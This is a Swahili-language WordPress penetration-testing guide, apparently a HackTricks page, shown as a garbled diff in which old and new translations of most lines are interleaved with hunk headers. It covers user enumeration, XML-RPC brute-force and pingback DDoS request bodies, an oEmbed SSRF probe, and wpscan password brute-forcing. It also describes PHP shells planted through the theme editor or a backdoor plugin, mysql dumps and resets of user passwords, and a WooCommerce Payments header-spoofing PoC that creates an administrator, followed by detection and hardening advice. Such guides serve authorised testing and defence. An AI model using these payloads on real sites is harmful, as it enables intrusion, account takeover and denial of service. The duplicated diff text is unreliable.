- `wp-activate.php` inatumika kwa mchakato wa uanzishaji wa email wakati wa kusanidi tovuti mpya ya WordPress.
- Folda za login (zinaweza kubadilishwa jina ili kuzificha):
- `/wp-admin/login.php`
- `/wp-admin/wp-login.php`
- `/login.php`
- `/wp-login.php`
- `xmlrpc.php` ni faili inayowakilisha feature ya WordPress inayoruhusu data kusafirishwa kwa kutumia HTTP kama transport mechanism na XML kama encoding mechanism. Aina hii ya mawasiliano imebadilishwa na WordPress [REST API](https://developer.wordpress.org/rest-api/reference).
- Folder ya `wp-content` ni saraka kuu ambapo plugins na themes zinahifadhiwa.
- `wp-content/uploads/` ni saraka ambapo faili zote zilizopakiwa kwenye platform zinahifadhiwa.
- `wp-includes/` ni saraka ambapo core files zinahifadhiwa, kama certificates, fonts, JavaScript files, na widgets.
- `wp-sitemap.xml` Katika WordPress versions 5.5 na baadaye, WordPress huunda faili ya sitemap XML yenye machapisho yote ya umma na post types na taxonomies zinazoweza kuulizwa hadharani.
- `xmlrpc.php` ni faili inayoonyesha kipengele cha WordPress kinachowawezesha data kutumwa kwa HTTP kama njia ya usafirishaji na XML kama njia ya kubandika. Aina hii ya mawasiliano imebadilishwa na WordPress [REST API](https://developer.wordpress.org/rest-api/reference).
- Folda ya `wp-content` ni saraka kuu ambapo plugins na themes zimehifadhiwa.
- `wp-content/uploads/` ni saraka ambapo faili zote zilizopakiwa kwenye jukwaa zinahifadhiwa.
- `wp-includes/` ni saraka ambayo faili za msingi zinahifadhiwa, kama certificates, fonts, faili za JavaScript, na widgets.
- `wp-sitemap.xml` Katika versions za WordPress 5.5 na zaidi, WordPress inazalisha faili ya sitemap XML yenye machapisho yote ya umma na aina za machapisho na taxonomies zinazoweza kuulizwa kwa umma.
**Post exploitation**
- Faili ya `wp-config.php` ina taarifa zinazohitajika na WordPress kuunganishwa na database kama jina la database, database host, username na password, authentication keys and salts, na database table prefix. Faili hii ya configuration pia inaweza kutumiwa kuwasha DEBUG mode, ambayo inaweza kusaidia katika troubleshooting.
- Faili ya `wp-config.php` ina taarifa zinazohitajika na WordPress kuunganishwa na database kama jina la database, database host, username na password, authentication keys na salts, na prefix ya jedwali la database. Faili hii ya usanidi pia inaweza kutumika kuwasha DEBUG mode, ambayo inaweza kuwa ya msaada katika kutatua matatizo.
### Users Permissions
### Ruhusa za Watumiaji
- **Administrator**
- **Editor**: Huchapisha na kusimamia machapisho yake na ya wengine
- **Author**: Huchapisha na kusimamia machapisho yake mwenyewe
- **Contributor**: Anaandika na kusimamia machapisho yake lakini hawezi kuyachapisha
- **Subscriber**: Vichapisho vya kivinjari na kuhariri profile yao
- **Editor**: Kuchapisha na kusimamia machapisho yake na ya wengine
- **Author**: Kuchapisha na kusimamia machapisho yake mwenyewe
- **Contributor**: Kuandika na kusimamia machapisho yake lakini hawezi kuyachapisha
- **Subscriber**: Kuangalia machapisho na kuhariri wasifu wao
## **Passive Enumeration**
### **Get WordPress version**
### **Pata toleo la WordPress**
Angalia kama unaweza kupata faili `/license.txt` au `/readme.html`
Ndani ya **source code** ya ukurasa (mfano kutoka [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)):
Ndani ya **source code** ya ukurasa (mfano kutoka kwa [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)):
- grep
```bash
@ -56,11 +56,11 @@ curl https://victim.com/ | grep 'content="WordPress'
![](<../../images/image (1111).png>)
- CSS link files
- Mafaili ya link za CSS
![](<../../images/image (533).png>)
- JavaScript files
- Mafaili ya JavaScript
![](<../../images/image (524).png>)
@ -72,44 +72,44 @@ curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/supp
```bash
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
### Kutoa matoleo kwa ujumla
### Chota matoleo kwa ujumla
```bash
curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
## Uorodheshaji wa Kivitendo
## Uorodheshaji hai
### Plugins and Themes
Huenda hautaweza kugundua Plugins and Themes zote zinazowezekana. Ili kuwagundua zote, utahitaji **kivitendo Brute Force orodha ya Plugins and Themes** (kwa bahati nzuri kwetu kuna zana za kiotomatiki ambazo zinajumuisha orodha hizi).
Huenda hautaweza kupata Plugins and Themes zote zinazowezekana. Ili kugundua zote, utahitaji **actively Brute Force a list of Plugins and Themes** (kwa bahati nzuri kwetu kuna zana za kiotomatiki zinazojumuisha orodha hizi).
### Watumiaji
- **ID Brute:** Unapata watumiaji halali kutoka kwenye tovuti ya WordPress kwa Brute Forcing IDs za watumiaji:
- **ID Brute:** Unapata watumiaji halali kutoka kwenye tovuti ya WordPress kwa Brute Forcing users IDs:
```bash
curl -s -I -X GET http://blog.example.com/?author=1
```
Iwapo majibu ni **200** au **30X**, hiyo ina maana id ni **halali**. Ikiwa jibu ni **400**, basi id ni **batili**.
Kama majibu ni **200** au **30X**, hiyo ina maana id ni **halali**. Ikiwa jibu ni **400**, basi id ni **batili**.
- **wp-json:** Unaweza pia kujaribu kupata taarifa kuhusu watumiaji kwa kuuliza:
```bash
curl http://blog.example.com/wp-json/wp/v2/users
```
Endpoint mwingine wa `/wp-json/` ambao unaweza kufichua baadhi ya taarifa kuhusu watumiaji ni:
Endpoint nyingine ya `/wp-json/` ambayo inaweza kufichua baadhi ya taarifa kuhusu watumiaji ni:
```bash
curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
```
Note that this endpoint only exposes users that have made a post. **Only information about the users that has this feature enable will be provided**.
Kumbuka kuwa endpoint hii inaonyesha tu watumiaji waliotengeneza chapisho. **Taarifa zitolewazo ni za watumiaji tu ambao kipengele hiki kimewezeshwa**.
Also note that **/wp-json/wp/v2/pages** could leak IP addresses.
Pia kumbuka kwamba **/wp-json/wp/v2/pages** inaweza leak anwani za IP.
- **Login username enumeration**: Wakati wa kuingia kwenye **`/wp-login.php`** **message** huwa **tofauti**, ikionyesha ikiwa **username** ipo au la.
- **Login username enumeration**: Unapojaribu kuingia kwenye **`/wp-login.php`** **ujumbe** hutofautiana — unaonyesha kama **username** ipo au la.
### XML-RPC
Ikiwa `xml-rpc.php` inafanya kazi unaweza kufanya credentials brute-force au kuitumia kuanzisha mashambulizi ya DoS kwa rasilimali nyingine. (You can automate this process[ using this](https://github.com/relarizky/wpxploit) for example).
Ikiwa `xml-rpc.php` ni active unaweza kufanya credentials brute-force au kuitumia kuzindua DoS attacks dhidi ya rasilimali nyingine. (Unaweza otomatisha mchakato huu[ using this](https://github.com/relarizky/wpxploit) kwa mfano).
To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
Ili kuona ikiwa imewekwa active jaribu kufikia _**/xmlrpc.php**_ na tuma ombi hili:
**Angalia**
```html
@ -122,7 +122,7 @@ To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
**Credentials Bruteforce**
**`wp.getUserBlogs`**, **`wp.getCategories`** au **`metaWeblog.getUsersBlogs`** ni baadhi ya mbinu ambazo zinaweza kutumika ku-brute-force credentials. Ikiwa unaweza kupata yoyote ya hizi unaweza kutuma kitu kama:
**`wp.getUserBlogs`**, **`wp.getCategories`** au **`metaWeblog.getUsersBlogs`** ni baadhi ya mbinu zinazoweza kutumika kwa brute-force credentials. Ikiwa unaweza kupata yoyote kati yao unaweza kutuma kitu kama:
```html
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
@ -132,13 +132,13 @@ To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
</params>
</methodCall>
```
Ujumbe _"Jina la mtumiaji au nywila si sahihi"_ ndani ya 200 code response unapaswa kuonekana ikiwa credentials sio sahihi.
Ujumbe _"Jina la mtumiaji au nenosiri si sahihi"_ ndani ya jibu la code 200 unapaswa kuonekana ikiwa maelezo ya kuingia si sahihi.
![](<../../images/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>)
![](<../../images/image (721).png>)
Kwa kutumia credentials sahihi unaweza kupakia faili. Katika response, path itaonekana ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
Kwa kutumia maelezo ya kuingia sahihi unaweza kupakia faili. Katika jibu njia itaonekana ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
```html
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
@ -168,18 +168,18 @@ Kwa kutumia credentials sahihi unaweza kupakia faili. Katika response, path itao
</params>
</methodCall>
```
Pia kuna njia ya **haraka zaidi** ya brute-force credentials kwa kutumia **`system.multicall`** kwani unaweza kujaribu credentials kadhaa katika ombi moja:
Pia kuna njia **haraka zaidi** ya brute-force credentials kwa kutumia **`system.multicall`**, kwani unaweza kujaribu credentials kadhaa katika ombi moja:
<figure><img src="../../images/image (628).png" alt=""><figcaption></figcaption></figure>
**Bypass 2FA**
Njia hii imelengwa kwa programu na si watu, ni ya zamani, kwa hiyo haitegemei 2FA. Kwa hivyo, ikiwa una creds halali lakini mlango mkuu umehifadhiwa na 2FA, **huenda ukaweza kutumia xmlrpc.php kuingia ukitumia creds hizo na kuepuka 2FA**. Kumbuka hutakuwa na uwezo wa kufanya vitendo vyote unavyoweza kupitia console, lakini bado huenda ukaweza kufikia RCE kama Ippsec anavyoelezea katika [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s)
Mbinu hii imekusudiwa kwa programu na si kwa watu, na ni ya zamani, hivyo haiungi mkono 2FA. Kwa hivyo, kama una creds halali lakini lango kuu limehifadhiwa kwa 2FA, **unaweza kuweza kutumia xmlrpc.php kuingia na hayo creds ukiepuka 2FA**. Kumbuka hautaweza kufanya vitendo vyote unavyoweza kupitia console, lakini bado unaweza kufikia RCE kama Ippsec anavyoeleza katika [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s)
**DDoS or port scanning**
**DDoS au port scanning**
Ikiwa unaweza kupata method _**pingback.ping**_ ndani ya orodha, unaweza kuifanya Wordpress itume ombi lolote kwa host/port yoyote.\
Hii inaweza kutumika kuomba **maelfu** ya **Wordpress** **sites** kufikia **eneo** moja (kwa hivyo **DDoS** itasababisha eneo hilo) au unaweza kuitumia kufanya **Wordpress** i**scan** mtandao wa ndani (unaweza kuainisha port yoyote).
Ikiwa unaweza kupata method _**pingback.ping**_ ndani ya orodha unaweza kufanya Wordpress itume ombi lolote kwa host/port yoyote.\
Hii inaweza kutumika kuomba **maelfu** ya Wordpress **sites** ziweze **access** eneo moja (hivyo kusababisha **DDoS** katika eneo hilo) au unaweza kuitumia kufanya **Wordpress** scan baadhi ya mtandao wa ndani (unaweza kuonyesha port yoyote).
```html
<methodCall>
<methodName>pingback.ping</methodName>
@ -191,9 +191,9 @@ Hii inaweza kutumika kuomba **maelfu** ya **Wordpress** **sites** kufikia **eneo
```
![](../../images/1_JaUYIZF8ZjDGGB7ocsZC-g.png)
Ikiwa unapata **faultCode** yenye thamani **kubwa zaidi** kuliko **0** (17), ina maana port iko wazi.
Ikiwa unapokea **faultCode** yenye thamani **kubwa kuliko** **0** (17), ina maana port iko wazi.
Angalia matumizi ya **`system.multicall`** katika sehemu iliyopita ili kujifunza jinsi ya kuitumia vibaya ili kusababisha DDoS.
Angalia matumizi ya **`system.multicall`** katika sehemu iliyopita ili ujifunze jinsi ya kutumia vibaya njia hii kusababisha DDoS.
**DDoS**
```html
@ -209,15 +209,15 @@ Angalia matumizi ya **`system.multicall`** katika sehemu iliyopita ili kujifunza
### wp-cron.php DoS
Faili hii kawaida huwa ndani ya root ya tovuti ya Wordpress: **`/wp-cron.php`**\
Wakati faili hii inapotumiwa, huanzishwa "**heavy**" MySQL **query**, hivyo inaweza kutumika na **attackers** kusababisha **DoS**.\
Pia, kwa default, `wp-cron.php` inaitwa kila wakati ukurasa unapopakiwa (mara zote mteja anapoomba ukurasa wowote wa Wordpress), jambo ambalo kwenye tovuti zenye trafiki kubwa linaweza kusababisha matatizo (DoS).
Faili hii kawaida huwa kwenye mzizi wa tovuti ya Wordpress: **`/wp-cron.php`**\
Wakati faili hii inapo **accessed** hufanywa "**heavy**" MySQL **query**, hivyo inaweza kutumika na **attackers** kusababisha **DoS**.\
Zaidi ya hayo, kwa default, `wp-cron.php` huwa inaitwa kila upakiaji wa ukurasa (wakati wowote client anapohitaji ukurasa wowote wa Wordpress), ambayo katika tovuti zenye trafiki kubwa inaweza kusababisha matatizo (DoS).
Inashauriwa kuzima Wp-Cron na kuunda cronjob halisi ndani ya host ambayo itaendesha vitendo vinavyohitajika kwa vipindi vya kawaida (bila kusababisha matatizo).
Inapendekezwa kuzima Wp-Cron na kuunda cronjob halisi ndani ya host inayotekeleza vitendo vinavyohitajika kwa vipindi vya kawaida (bila kusababisha matatizo).
### /wp-json/oembed/1.0/proxy - SSRF
Jaribu kufikia _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ na tovuti ya Worpress inaweza kutuma ombi kwako.
Jaribu kufikia _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ na Worpress site inaweza kutuma ombi kwako.
This is the response when it doesn't work:
@ -230,32 +230,32 @@ This is the response when it doesn't work:
https://github.com/t0gu/quickpress/blob/master/core/requests.go
{{#endref}}
Chombo hiki kinakagua kama **methodName: pingback.ping** na njia **/wp-json/oembed/1.0/proxy** zipo; ikiwa zipo, hujaribu ku-exploit.
Zana hii huangalia kama **methodName: pingback.ping** na kwa path **/wp-json/oembed/1.0/proxy** na ikiwa ipo, inajaribu ku-exploit yao.
## Zana za Otomatiki
## Zana za Kiotomatiki
```bash
cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
#You can try to bruteforce the admin user using wpscan with "-U admin"
```
## Pata ufikiaji kwa kubadilisha bit
## Kupata ufikiaji kwa kubadilisha bit
Zaidi ya kuwa shambulio halisi, hili ni jambo la ajabu. Katika CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) ulingeweza kubadilisha bit 1 kwenye faili yoyote ya wordpress. Hivyo ulingeweza kubadilisha nafasi `5389` ya faili `/var/www/html/wp-includes/user.php` ili ku-NOP operesheni ya NOT (`!`).
Hii ni zaidi ya shambulio halisi; ni jambo la udadisi. Katika CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man] unaweza kubadilisha bit 1 kutoka kwenye faili yoyote ya wordpress. Kwa hivyo unaweza kubadili nafasi `5389` ya faili `/var/www/html/wp-includes/user.php` ili kuifanya operesheni ya NOT (`!`) kuwa NOP.
```php
if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
return new WP_Error(
```
## **Paneli RCE**
## **RCE ya Paneli**
Kubadilisha php ya theme inayotumika (admin credentials needed)
**Badilisha php kutoka kwenye theme inayotumika (inahitaji admin credentials)**
Appearance → Theme Editor → 404 Template (kwa upande wa kulia)
Badilisha maudhui kwa php shell:
Badilisha yaliyomo kwa php shell:
![](<../../images/image (384).png>)
Tafuta mtandaoni jinsi ya kufikia ukurasa uliosasishwa. Katika kesi hii unapaswa kufikia hapa: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
Tafuta kwenye intaneti jinsi unavyoweza kufikia ukurasa huo uliosasishwa. Katika kesi hii lazima utembelee hapa: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
### MSF
@ -269,8 +269,8 @@ kupata session.
### PHP plugin
Inawezekana kupakia faili .php kama plugin.\
Tengeneza php backdoor yako kwa mfano:
Inawezekana kupakia .php files kama plugin.\
Tengeneza php backdoor yako kwa kutumia, kwa mfano:
![](<../../images/image (183).png>)
@ -286,44 +286,44 @@ Bonyeza Procced:
![](<../../images/image (70).png>)
Inawezekana hili halitaonekana kufanya chochote, lakini ukienda Media, utaona shell yako imepakizwa:
Inaonekana hii haitafanya chochote, lakini ukichagua Media, utaona shell yako imepakiwa:
![](<../../images/image (462).png>)
Fikia na utaona URL ya kutekeleza reverse shell:
Fikia faili hiyo na utaona URL ya kutekeleza reverse shell:
![](<../../images/image (1006).png>)
### Uploading and activating malicious plugin
### Kupakia na kuamsha plugin hatari
Njia hii inahusisha usakinishaji wa plugin hatari inayoonekana kuwa na uharibifu na inaweza kutumika kupata web shell. Mchakato huu unafanyika kupitia WordPress dashboard kama ifuatavyo:
Njia hii inahusisha usakinishaji wa plugin hatari inayojulikana kuwa na udhaifu na inaweza kutumika kupata web shell. Mchakato huu unafanywa kupitia WordPress dashboard kama ifuatavyo:
1. **Plugin Acquisition**: Plugin hupatikana kutoka chanzo kama Exploit DB kama [**here**](https://www.exploit-db.com/exploits/36374).
2. **Plugin Installation**:
- Navigate to the WordPress dashboard, then go to `Dashboard > Plugins > Upload Plugin`.
- Pakia faili la zip la plugin uliopakua.
3. **Plugin Activation**: Mara plugin imefanikiwa kusakinishwa, inapaswa kuamshwa kupitia dashboard.
- Nenda kwenye WordPress dashboard, kisha nenda `Dashboard > Plugins > Upload Plugin`.
- Upload zip file ya plugin uliopakua.
3. **Plugin Activation**: Mara plugin inapowekwa kwa mafanikio, lazima iamshwe kupitia dashboard.
4. **Exploitation**:
- Ukiwa na plugin "reflex-gallery" imewekwa na kuamshwa, inaweza kutumika kwa sababu inajulikana kuwa vulnerable.
- Metasploit framework inatoa exploit kwa kudumu hili. Kwa kuingiza module inayofaa na kutekeleza amri maalum, session ya meterpreter inaweza kuanzishwa, ikitoa ufikiaji usioidhinishwa kwenye tovuti.
- Inatambuliwa kuwa hii ni mojawapo tu ya njia nyingi za kuchuja tovuti ya WordPress.
- Ukiwa na plugin "reflex-gallery" imewekwa na kuiamsha, inaweza kutumika kwa sababu inajulikana kuwa na udhaifu.
- Metasploit framework inatoa exploit kwa udhaifu huu. Kwa kupakia module inayofaa na kutekeleza amri maalum, session ya meterpreter inaweza kuanzishwa, ikitoa ufikaji usioidhinishwa kwenye tovuti.
- Inafahamika kuwa hii ni mojawapo tu ya njia nyingi za kutumia udhaifu kwenye tovuti ya WordPress.
Yaliyomo yanajumuisha msaada wa picha unaoonyesha hatua kwenye WordPress dashboard za kusakinisha na kuamsha plugin. Hata hivyo, ni muhimu kutambua kuwa kutumia udhaifu kwa njia hii ni kinyume cha sheria na si ya maadili bila ruhusa sahihi. Taarifa hii inapaswa kutumika kwa uwajibikaji na tu katika muktadha wa kisheria, kama pentesting yenye idhini wazi.
Yaliyomo yanajumuisha msaada wa kuona unaoonyesha hatua kwenye WordPress dashboard za kusakinisha na kuamsha plugin. Hata hivyo, ni muhimu kutambua kwamba kutumia udhaifu kwa njia hii ni kinyume cha sheria na haifuli maadili bila ruhusa sahihi. Taarifa hizi zitatumika kwa uwajibikaji na tu katika muktadha wa kisheria, kama pentesting na idhini wazi.
**For more detailed steps check:** [**https://www.hackingarticles.in/wordpress-reverse-shell/**](https://www.hackingarticles.in/wordpress-reverse-shell/)
## From XSS to RCE
## Kutoka XSS hadi RCE
- [**WPXStrike**](https://github.com/nowak0x01/WPXStrike): _**WPXStrike**_ ni script iliyoundwa kuinua uvunjaji wa **Cross-Site Scripting (XSS)** hadi **Remote Code Execution (RCE)** au uwapo wa udhaifu mwingine mkali katika WordPress. Kwa maelezo zaidi angalia [**this post**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). Inatoa **support for Wordpress Versions 6.X.X, 5.X.X and 4.X.X. and allows to:**
- [**WPXStrike**](https://github.com/nowak0x01/WPXStrike): _**WPXStrike**_ ni script iliyoundwa kuinua udhaifu wa **Cross-Site Scripting (XSS)** hadi **Remote Code Execution (RCE)** au udhaifu mwingine wa hatari katika WordPress. Kwa habari zaidi angalia [**this post**](https://nowak0x01.github.io/papers/76bc0832a8f682a7e0ed921627f85d1d.html). Inatoa **support for Wordpress Versions 6.X.X, 5.X.X and 4.X.X. and allows to:**
- _**Privilege Escalation:**_ Inaunda user katika WordPress.
- _**(RCE) Custom Plugin (backdoor) Upload:**_ Pakia custom plugin yako (backdoor) kwenye WordPress.
- _**(RCE) Custom Plugin (backdoor) Upload:**_ Upload custom plugin yako (backdoor) kwenye WordPress.
- _**(RCE) Built-In Plugin Edit:**_ Hariri Built-In Plugins katika WordPress.
- _**(RCE) Built-In Theme Edit:**_ Hariri Built-In Themes katika WordPress.
- _**(Custom) Custom Exploits:**_ Custom Exploits kwa Third-Party WordPress Plugins/Themes.
## Post Exploitation
Chukua usernames na passwords:
Toa majina ya watumiaji na nywila:
```bash
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"
```
@ -333,27 +333,27 @@ mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE
```
## Wordpress Plugins Pentest
### Uso wa Mashambulizi
### Attack Surface
Kujua jinsi plugin ya Wordpress inaweza kufichua utendaji ni muhimu ili kupata udhaifu katika utendaji wake. Unaweza kuona jinsi plugin inaweza kufichua utendaji katika pointi zifuatazo na baadhi ya mifano ya plugins zilizo na udhaifu katika [**this blog post**](https://nowotarski.info/wordpress-nonce-authorization/).
Kujua jinsi plugin ya Wordpress inaweza kuonyesha functionality ni muhimu ili kupata vulnerabilities kwenye kazi zake. Unaweza kuona jinsi plugin inaweza kuonyesha functionality katika vidokezo vifuatavyo na baadhi ya mifano ya plugins zilizo na udhaifu katika [**this blog post**](https://nowotarski.info/wordpress-nonce-authorization/).
- **`wp_ajax`**
Moja ya njia ambazo plugin inaweza kufichua kazi kwa watumiaji ni kupitia AJAX handlers. Hizi zinaweza kuwa na mende za mantiki, idhinishaji, au uthibitishaji. Zaidi ya hayo, ni jambo la kawaida kwamba kazi hizi zitategemea uthibitishaji na idhinishaji kwa kuwepo kwa wordpress nonce ambayo **mtumiaji yoyote aliyethibitishwa kwenye mfumo wa Wordpress anaweza kuwa nayo** (bila kujali jukumu lake).
Moja ya njia ambazo plugin inaweza kuonyesha functions kwa watumiaji ni kupitia AJAX handlers. Hizi zinaweza kuwa na bug za logic, authorization, au authentication. Zaidi ya hayo, mara nyingi functions hizi zinategemea authentication na authorization kwa kuwepo kwa wordpress nonce ambayo **mtumiaji yeyote aliye authenticated katika instance ya Wordpress anaweza kuwa nayo** (bila kujali role yake).
These are the functions that can be used to expose a function in a plugin:
```php
add_action( 'wp_ajax_action_name', array(&$this, 'function_name'));
add_action( 'wp_ajax_nopriv_action_name', array(&$this, 'function_name'));
```
**Matumizi ya `nopriv` hufanya endpoint ipatikane kwa watumiaji wote (hata wale wasiojidhinishwa).**
**Matumizi ya `nopriv` hufanya endpoint ipatikane kwa watumiaji wote (hata wale wasiothibitishwa).**
> [!CAUTION]
> Zaidi ya hayo, ikiwa function inabaini tu idhini ya mtumiaji kwa kutumia `wp_verify_nonce`, function hiyo inathibitisha tu kwamba mtumiaji ameingia, kawaida haisemi jukumu la mtumiaji. Hivyo watumiaji wenye ruhusa ndogo wanaweza kufikia vitendo vya watumiaji wenye ruhusa kubwa.
> Zaidi ya hayo, ikiwa function inacheki tu idhini ya mtumiaji kwa kutumia `wp_verify_nonce`, function hii inabaini tu kwamba mtumiaji ameingia katika mfumo; kawaida haicheki jukumu (role) la mtumiaji. Kwa hivyo watumiaji wenye vibali vidogo wanaweza kupata ufikiaji wa vitendo vyenye vibali vya juu.
- **REST API**
Pia inawezekana kufichua functions kutoka wordpress kwa kusajili REST API kwa kutumia function `register_rest_route`:
Inawezekana pia kufichua functions kutoka wordpress kwa kusajili REST API kwa kutumia function `register_rest_route`:
```php
register_rest_route(
$this->namespace, '/get/', array(
@ -363,21 +363,21 @@ $this->namespace, '/get/', array(
)
);
```
The `permission_callback` ni callback — function inayokagua kama mtumiaji fulani ameidhinishwa kuita API method.
The `permission_callback` ni callback ya function inayokagua kama mtumiaji fulani ameidhinishwa kuita wito wa method ya API.
**Ikiwa function ya built-in `__return_true` itatumiwa, itapuuza ukaguzi wa ruhusa za mtumiaji.**
**Ikiwa function ya built-in `__return_true` itatumika, itapuuza ukaguzi wa ruhusa za mtumiaji.**
- **Direct access to the php file**
Bila shaka, Wordpress inatumia PHP na faili ndani ya plugins zinapatikana moja kwa moja kutoka kwenye web. Hivyo, ikiwa plugin inafichua functionality yoyote iliyo na udhaifu ambayo inasababisha tu kwa kufikia faili hiyo, itakuwa inaweza kutumiwa na mtumiaji yeyote.
Bila shaka, Wordpress inatumia PHP na faili ndani ya plugins zinaweza kupatikana moja kwa moja kutoka kwenye web. Hivyo, ikiwa plugin inaonyesha functionality yoyote yenye udhaifu ambayo inachochewa kwa kuingilia tu faili, itakuwa inaweza kutumika na mtumiaji yeyote.
### Trusted-header REST impersonation (WooCommerce Payments ≤ 5.6.1)
Baadhi ya plugins hufanya “trusted header” shortcuts kwa internal integrations au reverse proxies kisha hutumia header hiyo kuweka muktadha wa mtumiaji wa sasa kwa REST requests. Ikiwa header haifungwi kwa njia ya kriptografia kwenye request na component ya upstream, mshambuliaji anaweza kuiga header hiyo (spoof) na kufikia privileged REST routes kama administrator.
Baadhi ya plugins hutekeleza “trusted header” shortcuts kwa ajili ya internal integrations au reverse proxies na kisha hutumia header hiyo kuweka muktadha wa mtumiaji wa sasa kwa REST requests. Ikiwa header hiyo haijafungamanishwa kwa cryptographically kwenye request na sehemu ya upstream, mshambuliaji anaweza ku-spoof na kufikia privileged REST routes kama administrator.
- Athari: kupanuka kwa ruhusa bila uthibitisho hadi admin kwa kuunda administrator mpya kupitia core users REST route.
- Example header: `X-Wcpay-Platform-Checkout-User: 1` (inalazimisha user ID 1, kwa kawaida akaunti ya kwanza ya administrator).
- Exploited route: `POST /wp-json/wp/v2/users` with an elevated role array.
- Impact: kuongezeka kwa privilage bila uthibitisho hadi admin kwa kuunda administrator mpya kupitia core users REST route.
- Example header: `X-Wcpay-Platform-Checkout-User: 1` (inalazimisha user ID 1, kawaida akaunti ya kwanza ya administrator).
- Exploited route: `POST /wp-json/wp/v2/users` na array ya role iliyoinuliwa.
PoC
```http
@ -393,38 +393,38 @@ Content-Length: 114
```
Kwa nini inafanya kazi
- Plugin inafananisha header inayodhibitiwa na mteja na hali ya uthibitisho na inaruka ukaguzi wa capability.
- WordPress core inatarajia uwezo wa `create_users` kwa route hii; plugin hack inaukwepa kwa kuweka moja kwa moja muktadha wa current user kutoka kwa header.
- Plugin inamezea header inayodhibitiwa na mteja kwa hali ya authentication na inaruka ukaguzi wa capabilities.
- WordPress core inatarajia capability ya `create_users` kwa route hii; plugin hack inaitwepuka kwa kuweka moja kwa moja context ya current user kutoka kwa header.
Vionyeshi vya mafanikio vinavyotarajiwa
Viuashiria vya mafanikio yanayotarajiwa
- HTTP 201 na JSON body inayobainisha user iliyoundwa.
- HTTP 201 na body ya JSON inayoelezea user iliyoundwa.
- Admin user mpya inaonekana katika `wp-admin/users.php`.
Orodha ya kugundua
Orodha ya ukaguzi wa kugundua
- Grep kwa ajili ya `getallheaders()`, `$_SERVER['HTTP_...']`, au vendor SDKs zinazosomea custom headers ili kuweka muktadha wa mtumiaji (mfano, `wp_set_current_user()`, `wp_set_auth_cookie()`).
- Pitia REST registrations kwa callbacks zenye privileged actions ambazo hazina ukaguzi thabiti wa `permission_callback` na badala yake zinategemea request headers.
- Angalia matumizi ya core user-management functions (`wp_insert_user`, `wp_create_user`) ndani ya REST handlers ambazo zinazuia tu kwa thamani za header.
- Grep kwa `getallheaders()`, `$_SERVER['HTTP_...']`, au vendor SDKs zinazosomea headers maalum kuweka user context (mfano, `wp_set_current_user()`, `wp_set_auth_cookie()`).
- Kagua REST registrations kwa privileged callbacks ambazo hazina ukaguzi madhubuti wa `permission_callback` na badala yake zinategemea request headers.
- Angalia matumizi ya core user-management functions (`wp_insert_user`, `wp_create_user`) ndani ya REST handlers ambazo zinalindwa tu kwa thamani za header.
Kuimarisha usalama
Kuimarisha
- Usipatikane uthibitisho au idhini kutoka kwa headers zinazodhibitiwa na mteja.
- Ikiwa reverse proxy inapaswa kuingiza identity, ifunge trust kwenye proxy na futa nakala za inbound (mfano, `unset X-Wcpay-Platform-Checkout-User` kwenye edge), kisha pita token iliyosainiwa na uiweke wazi server-side.
- Kwa REST routes zinazofanya vitendo vya privileged, sitauli ukaguzi wa `current_user_can()` na tumia `permission_callback` kali (USITUMIE `__return_true`).
- Tumia uthibitisho wa first-party (cookies, application passwords, OAuth) badala ya “impersonation” kupitia header.
- Usitoke uthibitisho au idhini kutoka kwa headers zinazodhibitiwa na mteja.
- Ikiwa reverse proxy lazima iingize identity, iweke mwisho wa kuamini kwenye proxy na ifute nakala za inbound (mfano, `unset X-Wcpay-Platform-Checkout-User` kwenye edge), kisha pita token iliyosainiwa na iverify server-side.
